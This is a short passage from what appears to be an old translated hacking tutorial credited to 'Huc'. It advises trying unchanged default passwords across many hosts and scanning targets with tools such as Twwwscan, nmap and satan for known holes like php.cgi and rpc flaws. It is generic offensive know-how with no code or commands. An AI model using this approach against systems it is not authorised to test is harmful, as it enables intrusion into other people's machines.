Try enough hosts and you'll find that a great many passwords have never been changed!
4. Of course we also have to run vulnerability scans against the other side, to see whether there is any hole we can use directly. Details omitted. Twwwscan is good for scanning web holes, for instance to see whether the common php.cgi hole is there. Other, more comprehensive and powerful scans need scanners such as nmap and satan, for instance for rpc holes. All of these programs can be found through a search engine!
5. The key is the knowledge we accumulate day to day: once we have a target and know its system and services, being able to recall the relevant vulnerability material is best. Of course the highest level is discovering holes ourselves.


Original author: Huc
Source: Huc